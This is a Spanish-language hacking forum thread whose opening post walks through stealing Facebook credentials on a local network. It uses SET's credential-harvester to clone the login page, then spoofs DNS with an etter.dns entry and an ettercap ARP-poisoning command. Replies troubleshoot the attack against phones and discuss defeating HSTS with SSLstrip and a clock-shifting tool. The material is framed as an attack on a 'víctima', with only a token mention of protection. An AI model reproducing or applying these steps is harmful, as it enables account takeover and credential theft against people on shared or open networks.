comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Hackeando Facebook con Set & Ettercap

  • 7 Respuestas
  • 5457 Vistas

0 Usuarios y 3 Visitantes están viendo este tema.

Desconectado NuMB3RW4N

  • *
  • Underc0der
  • Mensajes: 40
  • Actividad:
    0%
  • Reputación 1
  • El Conocimiento Es Un Gran Placer De La Vida
    • Ver Perfil
    • Email
« en: Septiembre 20, 2016, 03:15:22 am »
SET


¿Que es SET?
SET es una completísima suite dedicada a la ingeniería social , que nos permite automatizar tareas que van desde el de envío de SMS (mensajes de texto) falsos, con los que podemos suplantar el numero telefónico que envía el mensaje, a clonar cualquier pagina web y poner en marcha un servidor para hacer phishing en cuestión de segundos. SET integra muchas de las funciones de Metasploit, es más, muchas de las funciones de SET las saca de Metasploit, por tanto no se concibe SET sin previamente tener instalado Metasploit. Quizás lo que mas nos ha llamado la atención de SET es su eficacia y agilidad a la hora de implementar su gran variedad de ataques… SET esta disponible en el BackTrack Linux y Kali Linux o puedes instalarlo desde su repositorio en git.



"git clone No tienes permisos para ver links. Registrate o Entra con tu cuenta"



Ettercap


Ettercap es un interceptor/sniffer/registrador para LANs con switch. Soporta direcciones activas y pasivas de varios protocolos (incluso aquellos cifrados, como SSH y HTTPS). También hace posible la inyección de datos en una conexión establecida y filtrado al vuelo aun manteniendo la conexión sincronizada gracias a su poder para establecer un Ataque Man-inthe-middle(Spoofing).
Muchos modos de sniffing fueron implementados para darnos un conjunto de herramientas poderoso y completo de sniffing. La instalacion dependen de tu SO





Requisitos:
Unos cigarros
Una Coca Cola
Estar conectado a la red de la vicitma (Wardriving)


Terminal
Una vez que estamos ya conectados a la red de nuestro target o víctima ejecutamos set (comando para OSX) , posicionados en la carpeta de instalación de SET





Comando :
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
Makuaz@mbp-de-juan /opt/set ][ 05:41:14 ] > sudo ./setoolkitY obtendremos una pantalla como esta :
Escogemos la opción 1




Ahora escogemos la opción 2 :
Y se nos lanza esta pantalla :




Ahora se muestra en pantalla la siguiente información con opciones :
Ahora escogemos la opción 3 :




Ahora escogemos la opción 2 :




Como dije anteriormente Seteamos la información solicitada:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
set:webattack> IP address for the POST back in Harvester/Tabnabbing:Recomiendo tu ip local
Enter the url to clone: Aqui la URL : No tienes permisos para ver links. Registrate o Entra con tu cuenta:

Finalmente obtendras una pantalla similar a esta :




Ahora revisas tu localhost y deberías de ver algo así:
Sin el error claro





Ahora vamos con Ettercap
Suponiendo que ya lo tienes instalado vamos a configurarlo :
La ruta de instalación depende de tu SO , en mi mac es la siguiente: /usr/local/etc/ettercap





Ahora modificaremos el archivo etter.dns con NANO y agregamos estas lineas :
No tienes permisos para ver links. Registrate o Entra con tu cuenta A 192.168.1.124 — Esta ip es de mi mac donde esta corriendo SET





Salvamos el archivo y ahora corremos el siguiente comando:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
sudo ettercap -Tq -i en1 -P dns_spoof -M arp // //Donde en1 es mi tarjeta de red , la tuya puede ser wlan0 , eth0 … etc




Ahora veremos una pantalla similar a esta




Ahora encenderé una maquina virtual con windows XP SP3 , la cual imaginemos que es una pc mas en la red (debe estar en modo Bridge).
Vemos como en la consola de ettercap aparace la maquina virtual





La cual Verificamos en la misma maquina con windows mediante el comando mundialmente famoso “ipconfig”




Ya en la maquina virtual abrimos Chrome ,Firefox ,o el navegador que tu uses y escribimos No tienes permisos para ver links. Registrate o Entra con tu cuenta .




Ahora vemos como ettercap toma la petición y hace referencia a mi prestada MackbookPro




Ahora revisamos el SET y vemos resultados!





Espero que te sirva y le des uso , recuerda comparte los contenidos para que mas
gente aprenda y pueda protegerse.


« Última modificación: Septiembre 20, 2016, 09:36:34 am por rollth »

Desconectado Cl0udswX

  • *
  • Colaborador
  • *
  • Mensajes: 869
  • Actividad:
    1.67%
  • Reputación 4
  • La fisica es el sistema operativo del universo.
    • Ver Perfil
    • cl0udswz - Sequre
  • Skype: cl0udzwx
  • Twitter: @cl0udswzsequre
« Respuesta #1 en: Septiembre 20, 2016, 10:26:18 pm »
 ;)

Muy bueno el material, muy bien explicado, resaltar que solo funciona dentro de la misma red LAN que la victima, pero dada la cantidad de usuarios que navegan en las redes wifi abiertas seria Puffff.

Saludos y gracias por compartir.
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


Desconectado lukhasPy

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Septiembre 21, 2016, 01:32:23 am »
Señores, yo necesito una gran ayuda de ustedes, y agradezco mucho si pueden responderme...
El problema es el siguiente: Yo sigo todos los pasos del contenido, pero cuando intento conectar mi teléfono móvil a la página de Facebook sale un error diciendo que la página no fue encontrada... A qué se debe eso? No funciona para teléfonos? OBS: Intenté con Firefox y Google Chrome en mi Sony Mobile... Estoy conectado en la misma red!
Y otra pregunta... Cuando hago el ataque de SSLSTRIP+ARPSPOOF, intento con Firefox en mi teléfono y la mayoría de las páginas se convierten en HTTP, pero por ejemplo Facebook y Gmail siempre se convierten en HTTPS y no consigo sniffear la información allí introducida...

Muchas gracias a todos, espero respuestas! :D
« Última modificación: Septiembre 21, 2016, 01:37:15 am por lukhasPy »

Desconectado Sur07

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Septiembre 24, 2016, 12:32:40 am »
Hola, lo he probado en 2 maquinas distintas con Windows 7 actualizado y directamente no abre la pagina www,facebook.com, ni con chrome y IE.

Desconectado r4gnath0r

  • *
  • Underc0der
  • Mensajes: 82
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Septiembre 25, 2016, 11:00:09 am »
Por lo que pude entender de todo lo que he leido el problema radica en la cabecera HSTS. Los navegadores guardan dicha cabecera para peticiones posteriores y asi tener una conexion segura mediante HTTPS. Segun el blog de Chema alonso, hay una herramienta llamada delorean que lo que hace es cambiar el reloj interno a 3 años después, borrando dicha cabecera y teniendo que pedirla de nuevo al servidor, pudiendo asi meternos en medio del trafico y cambiar la dirección.

Desconectado hum4n3xpl01t

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Septiembre 25, 2016, 01:56:15 pm »
Excelente post, muchas gracias .
Saludos

Desconectado AFelipeTrujillo

  • *
  • Underc0der
  • Mensajes: 6
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #6 en: Septiembre 27, 2016, 12:53:58 am »
Muy interesante hace mucho no me dedico al tema del hacking, me motivaste de nuevo.

Desconectado lestherelyhuneth123

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
  • Pinolero de corazón
    • Ver Perfil
« Respuesta #7 en: Septiembre 30, 2016, 01:40:06 am »
al ingresar el comando sudo ettercap -Tq -i en1 -P dns_spoof -M arp /ip victima/ /ip victima / me sale esto :
TARGET (dns_spoof) contain invalid chars !  porque me sale eso , alguien que me oriente porfavor se los agradecería mucho.
La información es poder úsala sabiamente

 

¿Te gustó el post? COMPARTILO!



SocialBox FrameWork BruteForce [Facebook, Gmail, Instragram,Twitter]

Iniciado por R3v0lve

Respuestas: 13
Vistas: 1506
Último mensaje Noviembre 16, 2018, 10:16:45 am
por DtxdF
Hackear facebook metodo pishing semi avanzado.

Iniciado por señorrobot

Respuestas: 2
Vistas: 1709
Último mensaje Julio 07, 2018, 12:40:50 am
por señorrobot
fbpwn: ingeniería social en Facebook (Multiplaforma)

Iniciado por Aryenal.Bt

Respuestas: 5
Vistas: 3680
Último mensaje Septiembre 26, 2012, 11:51:09 pm
por elshotta
[PoC] ¿Cómo hackear Facebook con un documento Word?

Iniciado por morodog

Respuestas: 3
Vistas: 6305
Último mensaje Diciembre 16, 2015, 09:08:01 am
por Snifer
Obtener cuenta de Facebook con Enlace Fake

Iniciado por Stiuvert

Respuestas: 4
Vistas: 6246
Último mensaje Junio 15, 2012, 08:16:49 pm
por Stuxnet